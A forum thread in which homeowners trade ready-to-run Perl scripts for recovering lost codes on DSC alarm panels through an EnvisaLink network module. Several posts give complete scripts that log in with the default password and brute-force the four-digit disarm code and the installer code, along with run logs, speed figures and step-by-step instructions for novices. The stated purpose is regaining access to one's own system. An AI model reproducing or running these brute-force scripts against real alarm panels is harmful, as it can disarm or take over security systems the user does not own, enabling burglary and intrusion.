EVL 4, DSC and lost installer code - hacking my own system

Information and support for EnvisaLink modules.

Moderators: EyezOnRich, GrandWizard

mikep
Posts: 138
Joined: Wed May 30, 2012 1:49 pm
Contact:

Re: EVL 4, DSC and lost installer code - hacking my own system

Post by mikep »

The 5108A response seem to indicate the panel has been armed in stay mode.
671 says the function isn't available (maybe a response to the *8 to enter installer programming while armed).
652 says the partition has been armed, looks to be in stay mode.
DscServer for android/linux/windows: https://sites.google.com/site/mppsuite/dscserver
K-Man
Posts: 145
Joined: Fri Jun 01, 2012 1:08 pm

Re: EVL 4, DSC and lost installer code - hacking my own system

Post by K-Man »

Yeah, MikeP has it right. You can't go into installers mode with the panel armed. You need to disarm all partitions on DSC systems to enter installers mode.
homediy
Posts: 6
Joined: Thu Jan 20, 2022 8:31 pm

Re: EVL 4, DSC and lost installer code - hacking my own system

Post by homediy »

mikep wrote:The 5108A response seem to indicate the panel has been armed in stay mode.
671 says the function isn't available (maybe a response to the *8 to enter installer programming while armed).
652 says the partition has been armed, looks to be in stay mode.
K-Man wrote:Yeah, MikeP has it right. You can't go into installers mode with the panel armed. You need to disarm all partitions on DSC systems to enter installers mode.
Thanks MikeP and K-Man, this is very helpful!!

So here's my situation, I bought a preowned home and inherited the already installed DSC system that was disarmed. I was given a code (assuming it's a user code) but as of today it didn't work. The system was disarmed but after my d*cking around i accidentally armed and trying the code passed on to me doesn't work, it didn't accept the code.

Thanks for indicating that I need to disarm first before I can get into the system. So now I'm thinking:

1. modify the script to brute force (to identify any code) that would disarm the system/partition (not sure what command/codes to send)
2. Run the original code to find my installer code?

Any help on what commands to send to send disarming code?

Also, is there somewhere that explains some of these HEX response codes?

My last resorts:
1. try hardwire factory reset (which means I need to learn how to reprogram existing system setup). Any reference on how to re-program would be helpful.
2. buy a new PC1616 board and replace it.


TIA!!
GrandWizard
Posts: 2319
Joined: Tue Nov 16, 2010 4:08 pm

Re: EVL 4, DSC and lost installer code - hacking my own system

Post by GrandWizard »

If you can't find a valid user code then you will have to factory default the panel unfortunately.
homediy
Posts: 6
Joined: Thu Jan 20, 2022 8:31 pm

Re: EVL 4, DSC and lost installer code - hacking my own system

Post by homediy »

Could I modify the script to brute force to simulate keypress to disarm the partition with user code?

Something like this:
1. send command 040 + 1<usercode>
2. look for a response code of 650, 655 or 750 (any other response code would be indicate a failure)
<loop again if not 650, 655, or 750)


Two things i'm uncertain:
1. I'm not too sure to use 040 or 071
2. physically on a keypad it says enter your user code to disarm, if incorrect, enter "#" followed by next user code. Do I need to simulate the "#" in code, if previous code is incorrect?
homediy
Posts: 6
Joined: Thu Jan 20, 2022 8:31 pm

Re: EVL 4, DSC and lost installer code - hacking my own system

Post by homediy »

To brute force to find my installer code I had to disarm my system first (I was given the wrong user code), I managed to figure it out what commands to send and modified the shared script to brute force for a user code.
The only issue in my script is my IF statement at the end to catch the user code if found won't exit the loop, it just waits for more responses. But once I heard the successful "disarm" beep from my panel, I stopped my script manually.

The output when a user code is found looks like this:

Code: Select all

[20220129_130242] DEBUG: Attempting 1234
[20220129_130242] sent data '071119479E\r\n' (length 12)
[20220129_130242] response: '5000712D\r\n' (length 10)
[20220129_130244] response: '51081FF\r\n' (length 9)
[20220129_130244] response: '750100018E\r\n' (length 12)
[20220129_130244] response: '6551D1\r\n' (length 8)
[20220129_130247] response: '6501CC\r\n' (length 8)
[20220129_130319] response: '60900332\r\n' (length 10)
[20220129_130319] response: '6531CF\r\n' (length 8)
[20220129_130320] response: '6100032A\r\n' (length 10)
[20220129_130321] response: '6501CC\r\n' (length 8)
[20220129_130326] response: '60900332\r\n' (length 10)
[20220129_130326] response: '6531CF\r\n' (length 8)
[20220129_130328] response: '6100032A\r\n' (length 10)
[20220129_130328] response: '6501CC\r\n' (length 8)


Here's my contribution (hope this helps in my situation):

Code: Select all

###############################
# - taken from Installer brute force script
###############################
## http://forum.eyez-on.com/FORUM/viewtopic.php?f=6&t=5025

#!/usr/bin/perl

use IO::Socket::INET;
use Time::HiRes qw ( time sleep );

############################
# Edit the variables below #
############################
# This is the IP of your EnvisaLink
# eg. 192.168.0.X, 10.0.0.X, etc.
$ip = "------ IP address here ----------------";

# This is your EnvisaLink password.  The default is user if you haven't changed it.
$password = "user";


# Range which you want to test
$code_start = "0000";
$code_end = "9999";


###############################################
# You shouldn't need to modify the code below #
###############################################

# auto-flush on socket
# force a flush after every write/print
$| = 1;

# Opens a new network socket on port 4025 (default port of EnvisaLink)
$socket = new IO::Socket::INET (
   PeerHost => $ip,
   PeerPort => '4025',
   Proto => 'tcp',
);

die "DEBUG: Cannot connect to EnvisaLink. REASON: $!\n" unless $socket;

# Start logging
# open OUT, ">log." . currenttime() . ".txt";
open(OUT, '>', "log." . currenttime() . ".txt") or die $!;

l0gt("DEBUG: Connected to EnvisaLink");

DSC_get();

DSC_put(DSC_cmd("005", $password));    # 005 - network login

$response = DSC_get();

foreach ($response) {
   /^5000052A.*5051CB/s && l0gt("DEBUG: Correct EnvisaLink password");
   /^5000052A.*5050CA/s && l0gt("DEBUG: Incorrect EnvisaLink password") && exit(1);
   /^.*5052CC/s && l0gt("DEBUG: Timeout") && exit(1);
}

$t = time;

l0gt("DEBUG: ===================================");

l0gt("DEBUG: Start user entry cycle");
l0gt("DEBUG: ----------------------");
for ($code = $code_start; $code <= $code_end; $code++) {

   $scode = sprintf("%04d", $code); # Pad code with leading 0s if <1000
   l0gt("DEBUG: Attempting $scode");
   DSC_put(DSC_cmd("071", "1${scode}"));      # 040 to send disarm command, partition 1, with user code

   # if successful you should get any of or all of the following codes:
   #  609 (Zone open)
   #  610 (Zone restored)
   #  650 or 653 (Partition Ready) response
   #  655 (Partition disarmed) response or
   #  750 (User Opening) response
   
   # if error system will return:
   #    502 (System error)
   #    670 (Invalid Access Code) or 652 (Partition armed)

   #$r = DSC_get_ww("^609|^610|^653|^670|^652|^650|^655|^750"); #look for positive response
   $r = DSC_get_w();

   ## TODO: catching successful isn't work yet.. it doesn't exit
   if ($r =~ /^609|^610|^653|^650|^655|^750/) {
     l0gt("SUCCESS: $scode is the user code");
     l0gt("DEBUG: End user code entry cycle");
     exit(0);
   }
   l0gt("                     ");
}


close OUT;
$socket->close();

# This will create a timestamp in localtime
sub l0gt {
   my $s = shift;
   my ($sec,$min,$hour,$mday,$mon,$year,$wday,$yday,$isdst) = localtime(time);
   l0g("[" . sprintf("%.4d%.2d%.2d_%.2d%.2d%.2d", $year+1900, $mon+1, $mday, $hour, $min, $sec) . "] $s");
}

# This prints to STDOUT as well as logfile
sub l0g {
   my $s = shift;
   print "$s\n";
   print OUT "$s\n";
}

sub currenttime {
   my ($sec,$min,$hour,$mday,$mon,$year,$wday,$yday,$isdst) = localtime(time);
   my $yyyymmddhhmmss = sprintf "%.4d%.2d%.2d_%.2d%.2d%.2d", $year+1900, $mon+1, $mday, $hour, $min, $sec;
   $yyyymmddhhmmss;
}

# Converts text to ASCII values
sub DSC_cs {
   my @chars = (split//, shift);
   my $cs = 0;
   foreach (@chars) { $cs += ord($_); }
   return sprintf("%.2X", $cs & 0xFF);
};

# Formats command
sub DSC_cmd {
   my $cmd = shift . shift;
   return $cmd.DSC_cs($cmd);
}

# Logs a response
sub DSC_get {
   my $response = "";
   $socket->recv($response, 1024);
   my $hresponse = $response; $hresponse =~ s/\n/\\n/g; $hresponse =~ s/\r/\\r/g;
   l0gt("response: '$hresponse' (length " . length($response) .")");
   return $response;
}

# Waits for response(s) and logs it
sub DSC_get_w {      # wait for data
   my $response = "";
X: sleep(0.1);
   $socket->recv($response, 1024);
   if ($response eq "") { goto X; }
   my $hresponse = $response; $hresponse =~ s/\n/\\n/g; $hresponse =~ s/\r/\\r/g;
   l0gt("response: '$hresponse' (length " . length($response) .")");
   return $response;
}

# Waits for a specific response and logs it
sub DSC_get_ww {      # wait for specific data
   my $response = "";
   my $wanted = shift;
X: sleep(0.1);
   $socket->recv($response, 1024);
   if ($response eq "") { goto X; }
   my $hresponse = $response; $hresponse =~ s/\n/\\n/g; $hresponse =~ s/\r/\\r/g;
   l0gt("response: '$hresponse' (length " . length($response) .")");
   unless ($response =~ /$wanted/) { goto X; }
   return $response;
}

# Sends a command and logs it
sub DSC_put {
   my $req = shift . "\r\n";
   my $size = $socket->send($req);
   my $hreq = $req; $hreq =~ s/\n/\\n/g; $hreq =~ s/\r/\\r/g;
   l0gt("sent data '$hreq' (length $size)");
}
Also, with this script I found often that after a few attempts the responses just stop coming but the program doesn't end, nor throw an error; it just sits there. I'm not sure if my connect got cut/interrupted or something. So many times I had to stop the script, update my script to new start number and restart the script where it left off.. the STDOUT wasn't always capturing either, especially when it errors out like that.

So instead, modify the l0gt and l0g to output to screen only and when you run the script to pipe it to tee to capture the output to a file. It guaranteed for me that what I see on the screen will also be in the output file.

Code: Select all

perl <script file> | tee ouputfile.txt
colt45
Posts: 1
Joined: Thu Aug 18, 2022 8:18 pm

Re: EVL 4, DSC and lost installer code - hacking my own system

Post by colt45 »

Thank you! I used this updated code from user baobao. It worked perfectly for my DSC 1616.

If you don't know how to run this code, it's not that hard. I did it from my PC which is on the same network as my EnvisaLink. First you should install Perl (I used the strawberry perl). Watch a quick youtube video on how to use perl and you'll get it. And then use Windows Notepad to paste the code below. Make the 2 changes required to make it work (IP address and password). Then save the file in a folder, such as c:\user\yourname\perl\. When I saved my file, I just called it DSC.pl
Open your command prompt and go to the directory where your file is (For me I think I just typed: cd perl). Make sure your alarm is not armed. Then to execute the code in command prompt, type "perl DSC.pl"
My installer code started with a 1, and it took about 80 minutes. If yours starts with a 9 it might take 5 or 6 hours.

Thanks again to all who spent time writing this code, and then sharing it. Y'all are awesome. I have never coded anything and I was able to do this. Now I don't have to pay my former alarm company $150 to come remove his installer code.

baobao wrote:I did a few changes, the scanning speed is now about 22~24/min.

#http://forum.eyez-on.com/FORUM/viewtopi ... 9&start=30
#https://www.reddit.com/r/homeassistant/ ... ller_code/
#!/usr/bin/perl

use IO::Socket::INET;
use Time::HiRes qw ( time sleep );

############################
# Edit the variables below #
############################

# This is the IP of your EnvisaLink
# eg. 192.168.0.X, 10.0.0.X, etc.
$ip = "192.168.1.XXX";

# This is your EnvisaLink password. The default is user if you haven't changed it.
$password = "user";

# Range which you want to test
$code_start = "0000";
$code_end = "9999";

###############################################
# You shouldn't need to modify the code below #
###############################################

# auto-flush on socket
# force a flush after every write/print
$| = 1;

# Opens a new network socket on port 4025 (default port of EnvisaLink)
$socket = new IO::Socket::INET (
PeerHost => $ip,
PeerPort => '4025',
Proto => 'tcp',
);

die "DEBUG: Cannot connect to EnvisaLink. REASON: $!\n" unless $socket;

# Start logging
# open OUT, ">log." . currenttime() . ".txt";
open(OUT, '>', "log." . currenttime() . ".txt") or die $!;

l0gt("DEBUG: Connected to EnvisaLink");

DSC_get();

DSC_put(DSC_cmd("005", $password)); # 005 - network login

$response = DSC_get();

foreach ($response) {
/^5000052A.*5051CB/s && l0gt("DEBUG: Correct EnvisaLink password");
/^5000052A.*5050CA/s && l0gt("DEBUG: Incorrect EnvisaLink password") && exit(1);
/^.*5052CC/s && l0gt("DEBUG: Timeout") && exit(1);
}

$t = time;

for ($code = $code_start; $code <= $code_end; $code++) {
l0gt("DEBUG: Start installer mode entry cycle");
DSC_put(DSC_cmd("071", "1*8")); # 071 send keys, partition 1, '*8' enter installer mode
# DSC_get_ww("^922"); # Wait for 922 (EVL requests installer code)
$r = DSC_get_ww("^922|^6[58]");
while (index($r, "922") == -1) {
l0gt("There is an exception: '$r'"); # retry
DSC_put(DSC_cmd("071", "1##")); # 071 send keys, partition 1, '##' possibly back out of installer menu
DSC_get_w();
sleep(0.6);
l0gt("fuck up DEBUG: Start installer mode entry cycle");
DSC_put(DSC_cmd("071", "1*8")); # 071 send keys, partition 1, '*8' enter installer mode
# DSC_get_ww("^922"); # Wait for 922 (EVL requests installer code)
$r = DSC_get_ww("^922|^6[58]");
}
l0gt("got 922");
$scode = sprintf("%04d", $code); # Pad code with leading 0s if <1000
l0gt("DEBUG: Attempting $scode");
DSC_put(DSC_cmd("200", $scode)); # 200 send a code

# if the code is wrong you will get a 670 response and it will request another installer code via 922
# on my system it will only let you try again once via a 922
# 650=partition ready, 670=invalid access code, 680=system is in installer mode

$r = DSC_get_ww("^922|^6[58]"); #look for retry or ready or installer mode code

# sleep(1.5);
# try again if given opportunity via 922
while ($r =~ /^922/) {
l0gt("DEBUG 2nd try: Trying again within same cycle");
$code++;
$scode = sprintf("%04d", $code);
l0gt("DEBUG: Attempting $scode");
DSC_put(DSC_cmd("200", $scode));
$r = DSC_get_ww("^670|^6[58]"); #look for retry or ready or installer mode code
#If your system is like mine and only allows one retry,
#accept 670 as a response here, add a 0.6s sleep, and comment out the loop.
#this way it doesn't wait for the system to timeout and forces it to go back to the main menu.
}

l0gt("DEBUG: If we're in installer mode, back out to main menu");
DSC_put(DSC_cmd("071", "1##")); # 071 send keys, partition 1, '##' possibly back out of installer menu
DSC_get_w();
sleep(0.6); # wait for messages to be processed, otherwise "Keybus Transmit Buffer Overrun"
if ($r =~ /^680/) {l0gt("SUCCESS: $scode is the installer code"); exit(0); }
l0gt("DEBUG: End installer mode entry cycle");
}

close OUT;
$socket->close();

# This will create a timestamp in localtime
sub l0gt {
my $s = shift;
my ($sec,$min,$hour,$mday,$mon,$year,$wday,$yday,$isdst) = localtime(time);
l0g("[" . sprintf("%.4d%.2d%.2d_%.2d%.2d%.2d", $year+1900, $mon+1, $mday, $hour, $min, $sec) . "] $s");
}

# This prints to STDOUT as well as logfile
sub l0g {
my $s = shift;
print "$s\n";
print OUT "$s\n";
}

sub currenttime {
my ($sec,$min,$hour,$mday,$mon,$year,$wday,$yday,$isdst) = localtime(time);
my $yyyymmddhhmmss = sprintf "%.4d%.2d%.2d_%.2d%.2d%.2d", $year+1900, $mon+1, $mday, $hour, $min, $sec;
$yyyymmddhhmmss;
}

# Converts text to ASCII values
sub DSC_cs {
my @chars = (split//, shift);
my $cs = 0;
foreach (@chars) { $cs += ord($_); }
return sprintf("%.2X", $cs & 0xFF);
};

# Formats command
sub DSC_cmd {
my $cmd = shift . shift;
return $cmd.DSC_cs($cmd);
}

# Logs a response
sub DSC_get {
my $response = "";
$socket->recv($response, 1024);
my $hresponse = $response; $hresponse =~ s/\n/\\n/g; $hresponse =~ s/\r/\\r/g;
l0gt("response: '$hresponse' (length " . length($response) .")");
return $response;
}

# Waits for response(s) and logs it
sub DSC_get_w { # wait for data
my $response = "";
X: sleep(0.1);
$socket->recv($response, 1024);
if ($response eq "") { goto X; }
my $hresponse = $response; $hresponse =~ s/\n/\\n/g; $hresponse =~ s/\r/\\r/g;
l0gt("response: '$hresponse' (length " . length($response) .")");
return $response;
}

# Waits for a specific response and logs it
sub DSC_get_ww { # wait for specific data
my $response = "";
my $wanted = shift;
X: sleep(0.1);
$socket->recv($response, 1024);
if ($response eq "") { goto X; }
my $hresponse = $response; $hresponse =~ s/\n/\\n/g; $hresponse =~ s/\r/\\r/g;
l0gt("response: '$hresponse' (length " . length($response) .")");
unless ($response =~ /$wanted/) { goto X; }
return $response;
}

# Sends a command and logs it
sub DSC_put {
my $req = shift . "\r\n";
my $size = $socket->send($req);
my $hreq = $req; $hreq =~ s/\n/\\n/g; $hreq =~ s/\r/\\r/g;
l0gt("sent data '$hreq' (length $size)");
}
Twix007
Posts: 1
Joined: Sat Feb 25, 2023 4:33 am

Re: EVL 4, DSC and lost installer code - hacking my own system

Post by Twix007 »

bobao thank you so much for this post and code! I used code I on found on Reddit to get my install code and after 5 days it still never found the code. The post with code from bobao actually works at an incredible speed and its logical when it runs. It runs one code at a time with a response from the DSC module before running another one vs 10 codes at a time (plus major delays) with the one on Reddit. Boboa's in this thread processed about 4,000 codes an hour! Finally got my install code, thank you colt45 for your post, thank you, thank you!!!!!
1fiercefish
Posts: 3
Joined: Wed Aug 09, 2023 2:27 pm

Re: EVL 4, DSC and lost installer code - hacking my own system

Post by 1fiercefish »

Really glad I found this, though I have a Honeywell Vista panel which doesn't have quite the same operations as DSC. Curious if anyone has done something similar for Vista panels?
GrandWizard
Posts: 2319
Joined: Tue Nov 16, 2010 4:08 pm

Re: EVL 4, DSC and lost installer code - hacking my own system

Post by GrandWizard »

1fiercefish wrote: Wed Aug 09, 2023 2:30 pm Really glad I found this, though I have a Honeywell Vista panel which doesn't have quite the same operations as DSC. Curious if anyone has done something similar for Vista panels?
You generally don't have to do this as Honeywell panels have the "back door" method. See our Honeywell Installation Guide on your portal under Support.
Post Reply